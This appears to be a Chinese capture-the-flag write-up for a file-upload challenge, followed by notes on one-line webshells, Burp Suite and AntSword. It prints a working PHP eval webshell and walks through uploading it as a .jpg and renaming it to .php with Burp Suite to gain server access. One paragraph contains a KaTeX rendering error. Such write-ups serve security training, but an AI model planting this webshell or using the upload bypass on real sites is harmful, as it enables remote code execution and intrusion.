这是题目,可以看出是个上传文件的题目,考虑文件上传漏洞,先随便上传一个文件试试,要求上传的是图片。
可以看到上传成功。
考虑用一句话木马解决,构造文件并修改后缀为jpg,然后上传。
<?php
@eval($_POST['attack']);
?>
上传成功
打开burpsuite,
jpg改为php
forward,看到php格式上传成功
打开蚁剑,
打开flag.php,找到flag
总结:文件上传漏洞,通过一句话木马获取访问后台的权限,进而拿到flag
知识点:
1.一句话木马:
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形和流量加密方式,但本质是不变的:木马的函数执行了我们发送的命令,并将命令的执行结果返回。
一般WEB页面通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用KaTeX parse error: Double superscript at position 8: _GET[' '̲]、_POST[’ ‘]、$_COOKIE[’ '] 接收客户端传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。
利用文件上传漏洞,往目标网站中上传一句话木马,
@表示后面即使执行错误,也不报错
eval()函数表示括号内的全都当做代码执行
$_POST[‘attack’]表示从页面中获得attack参数值
当我们从页面给attack赋值PHP代码后就会得到执行,蚁剑的原理就是构造获取后台的PHP代码然后上传并执行!
2.burpsuite
Burp Suite是一款流行的集成式Web应用程序安全测试工具套件,广泛应用于渗透测试、安全审计、黑盒测试和漏洞研究等Web安全领域。它由PortSwigger公司开发,提供可视化界面和扩展机制,支持各种安全测试,可通过代理截获HTTP和HTTPS请求,观察请求和响应,对请求进行修改和重发,协助发现和验证Web应用程序的各种漏洞,如跨站点脚本、SQL注入、文件包含等。
Burp Suite包含了多个工具,如代理、重放器、爬虫、扫描器和拦截器等。其中,代理是最重要的组件之一,可以拦截所有的HTTP/HTTPS请求和响应,对数据进行修改和重发,使测试人员可以更全面地了解Web应用程序的行为。另外,Burp Suite的扫描器可以自动发现应用程序中可能存在的漏洞,提高了测试效率和准确性。
Burp Suite是一款功能强大、易于使用的Web应用程序安全测试工具套件,对于Web应用程序的安全测试和评估提供了有力的支持。
3.蚁剑
中国蚁剑(AntSword)是一款跨平台的开源网站管理工具,旨在为渗透测试人员、安全研究人员以及网站管理员提供一个强大的工具集。该项目主要使用JavaScript作为编程语言,结合了Electron、ES6、dhtmlx、Node.js等技术栈,确保了工具的跨平台兼容性和高效性。
项目核心功能
中国蚁剑的核心功能包括但不限于:
网站管理:提供全面的网站管理功能,包括文件管理、数据库管理、命令执行等。
跨平台支持:支持Windows、Linux、macOS等多个操作系统,确保用户在不同环境下都能高效使用。
模块化设计:采用模块化设计思路,方便用户理解和修改代码,同时也鼓励社区贡献。